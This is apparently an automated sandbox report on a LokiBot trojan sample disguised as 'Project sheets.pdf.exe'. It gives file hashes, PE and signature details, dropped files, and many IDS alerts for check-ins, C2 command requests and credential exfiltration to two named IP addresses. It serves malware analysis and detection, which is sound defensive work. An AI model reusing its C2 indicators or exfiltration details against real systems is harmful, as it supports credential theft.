                  Sample file name:Project sheets.pdf.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/3@74/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 97.9% (good quality ratio 93.9%)
                  • Quality average: 76.9%
                  • Quality standard deviation: 28.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Adjust boot time
                  • Enable AMSI
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • HTTP Packets have been reduced
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 23.211.6.115
                  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  06:42:14API Interceptor71x Sleep call for process: cvtres.exe modified
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Users\user\Desktop\Project sheets.pdf.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):226
                  Entropy (8bit):5.3467126928258955
                  Encrypted:false
                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                  MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                  SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                  SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                  SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbON:u
                  MD5:89CA7E02D8B79ED50986F098D5686EC9
                  SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                  SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                  SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:........................................user.
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.523144496622303
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  • Win32 Executable (generic) a (10002005/4) 49.97%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Project sheets.pdf.exe
                  File size:177696
                  MD5:b9ff215d1d69d1a6d7568eecc3ecd245
                  SHA1:6f17bbed238dc4571db8b43fad392c6ef3b88fa5
                  SHA256:c06061604c0d1be02e69e00ada53ceb9e2d5ba9d47f93fc20cafa149513a12e1
                  SHA512:36c74d69a70f9faad528b5f91aa89ed040ac03a515121258b680188ba499322797e2103e7fa30464b0e823fe5df14d2d71cdd190ff67d5bab2d0aaeee47c2aa7
                  SSDEEP:3072:QZiMlRrtGIepA7NKAs+fgobpWxuHAXTDlnD0y/Bv1vzuJJyL:QZiMzhGIeUhs5otWxugxgy/Bv1vzuJ
                  TLSH:4C045B9D366035CFC95BD9729AA81C24EA2034BB530BC253A09725ADCE4DAD7CF191F3
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b@.b..............0..^...........|... ........@.. ..............................DJ....`................................
                  Icon Hash:92aca8b2b2a2b286
                  Entrypoint:0x427c2e
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x62F44062 [Wed Aug 10 23:33:54 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Signature Valid:false
                  Signature Issuer:CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                  Signature Validation Error:The digital signature of the object did not verify
                  Error Number:-2146869232
                  Not Before, Not After
                  • 10/29/2013 5:00:00 PM 1/4/2017 4:00:00 AM
                  Subject Chain
                  • CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU
                  Version:3
                  Thumbprint MD5:FB7AAB26B203432685FBC0FF17F24045
                  Thumbprint SHA-1:32387AEC09EB287F202E98398189B460F4C61A0D
                  Thumbprint SHA-256:E0E85619EEF45FCE4421E4BA581060E43BBBF25911CD757DD081DA425DD1DB51
                  Serial:0FF1EF66BD621C65B74B4DE41425717F
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x27bd40x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x19c8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x27c000x3a20
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x27b900x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x25c340x25e00False0.80277949669967data7.534046578744168IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x280000x19c80x1a00False0.3330829326923077data5.2485738132687745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x2a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x281680x10a8data
                  RT_ICON0x292100x468GLS_BINARY_LSB_FIRST
                  RT_GROUP_ICON0x296780x22data
                  RT_VERSION0x2969c0x32cdata
                  DLLImport
                  mscoree.dll_CorExeMain
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.3188.114.97.349852802025381 08/11/22-06:43:38.361573TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802021641 08/11/22-06:43:11.901228TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802825766 08/11/22-06:42:50.570997TCP2825766ETPRO TROJAN LokiBot Checkin M24978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802024313 08/11/22-06:42:53.219319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802024318 08/11/22-06:43:09.287221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802024313 08/11/22-06:43:13.321407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802021641 08/11/22-06:43:55.376397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349753802024318 08/11/22-06:42:25.207102TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349760802024318 08/11/22-06:42:32.923604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349754802025381 08/11/22-06:42:26.308314TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802024313 08/11/22-06:43:09.287221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802825766 08/11/22-06:43:54.330408TCP2825766ETPRO TROJAN LokiBot Checkin M24988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349760802024313 08/11/22-06:42:32.923604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349888802024313 08/11/22-06:44:00.133246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349798802021641 08/11/22-06:43:06.576803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802024313 08/11/22-06:43:24.421881TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802021641 08/11/22-06:42:21.832277TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802825766 08/11/22-06:44:06.157277TCP2825766ETPRO TROJAN LokiBot Checkin M24989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802021641 08/11/22-06:42:15.052087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349797802825766 08/11/22-06:43:05.379365TCP2825766ETPRO TROJAN LokiBot Checkin M24979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349743802024312 08/11/22-06:42:14.045456TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802025381 08/11/22-06:42:56.651534TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349830802021641 08/11/22-06:43:16.837786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802024318 08/11/22-06:43:24.421881TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802025381 08/11/22-06:43:45.824252TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349796802024318 08/11/22-06:43:04.193279TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349796802024313 08/11/22-06:43:04.193279TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802021641 08/11/22-06:43:40.660156TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802825766 08/11/22-06:44:03.457387TCP2825766ETPRO TROJAN LokiBot Checkin M24989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802024318 08/11/22-06:42:30.656105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802024313 08/11/22-06:42:34.002289TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802024313 08/11/22-06:42:30.656105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802024318 08/11/22-06:42:46.945645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802825766 08/11/22-06:43:45.824252TCP2825766ETPRO TROJAN LokiBot Checkin M24986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802024318 08/11/22-06:42:34.002289TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349743802024317 08/11/22-06:42:14.045456TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802825766 08/11/22-06:42:26.308314TCP2825766ETPRO TROJAN LokiBot Checkin M24975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349789802825766 08/11/22-06:42:55.412963TCP2825766ETPRO TROJAN LokiBot Checkin M24978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802021641 08/11/22-06:44:07.789189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349753802024313 08/11/22-06:42:25.207102TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349797802025381 08/11/22-06:43:05.379365TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802825766 08/11/22-06:42:56.651534TCP2825766ETPRO TROJAN LokiBot Checkin M24979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349888802024318 08/11/22-06:44:00.133246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349747802021641 08/11/22-06:42:18.537201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802024318 08/11/22-06:43:31.924022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802025381 08/11/22-06:42:49.154690TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802025381 08/11/22-06:43:54.330408TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349889802024313 08/11/22-06:44:01.764745TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802025381 08/11/22-06:42:35.961537TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802021641 08/11/22-06:42:12.661275TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802024318 08/11/22-06:42:24.044623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349795802025381 08/11/22-06:43:03.020333TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802024313 08/11/22-06:42:24.044623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349789802025381 08/11/22-06:42:55.412963TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802021641 08/11/22-06:43:31.924022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802021641 08/11/22-06:42:16.160936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349889802024318 08/11/22-06:44:01.764745TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802025381 08/11/22-06:43:10.662100TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802825766 08/11/22-06:42:35.961537TCP2825766ETPRO TROJAN LokiBot Checkin M24976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802025381 08/11/22-06:44:03.457387TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802021641 08/11/22-06:42:41.209817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349749802021641 08/11/22-06:42:20.745320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349883802021641 08/11/22-06:43:53.308240TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349756802025381 08/11/22-06:42:28.447484TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349800802024313 08/11/22-06:43:08.046752TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802024313 08/11/22-06:42:42.773950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802825766 08/11/22-06:43:48.403290TCP2825766ETPRO TROJAN LokiBot Checkin M24987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349875802825766 08/11/22-06:43:47.334573TCP2825766ETPRO TROJAN LokiBot Checkin M24987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349746802025381 08/11/22-06:42:17.452589TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802021641 08/11/22-06:42:46.945645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802025381 08/11/22-06:44:08.828123TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349832802025381 08/11/22-06:43:19.747801TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802024318 08/11/22-06:43:51.663595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802025381 08/11/22-06:42:31.695874TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802024313 08/11/22-06:43:51.663595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349755802825766 08/11/22-06:42:27.395952TCP2825766ETPRO TROJAN LokiBot Checkin M24975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349782802025381 08/11/22-06:42:50.570997TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349800802024318 08/11/22-06:43:08.046752TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802021641 08/11/22-06:42:45.276948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349895802025381 08/11/22-06:44:06.157277TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802825766 08/11/22-06:42:58.117986TCP2825766ETPRO TROJAN LokiBot Checkin M24979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349763802024313 08/11/22-06:42:39.324991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802024318 08/11/22-06:43:06.576803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349763802024318 08/11/22-06:42:39.324991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802025381 08/11/22-06:42:59.404301TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349859802025381 08/11/22-06:43:42.759258TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802021641 08/11/22-06:43:50.015660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802021641 08/11/22-06:43:28.505356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802024313 08/11/22-06:42:44.099150TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802025381 08/11/22-06:42:42.773950TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349757802025381 08/11/22-06:42:29.610436TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802024318 08/11/22-06:42:44.099150TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802021641 08/11/22-06:43:47.334573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802825766 08/11/22-06:43:58.405291TCP2825766ETPRO TROJAN LokiBot Checkin M24988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349811802024313 08/11/22-06:43:10.662100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802025381 08/11/22-06:42:41.209817TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349789802024313 08/11/22-06:42:55.412963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802825766 08/11/22-06:42:59.404301TCP2825766ETPRO TROJAN LokiBot Checkin M24979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349755802025381 08/11/22-06:42:27.395952TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349762802021641 08/11/22-06:42:35.961537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349892802825766 08/11/22-06:44:04.916628TCP2825766ETPRO TROJAN LokiBot Checkin M24989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802024313 08/11/22-06:43:06.576803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349888802021641 08/11/22-06:44:00.133246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349760802021641 08/11/22-06:42:32.923604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349742802825766 08/11/22-06:42:12.661275TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349832802021641 08/11/22-06:43:19.747801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802021641 08/11/22-06:44:08.828123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.3188.114.96.3
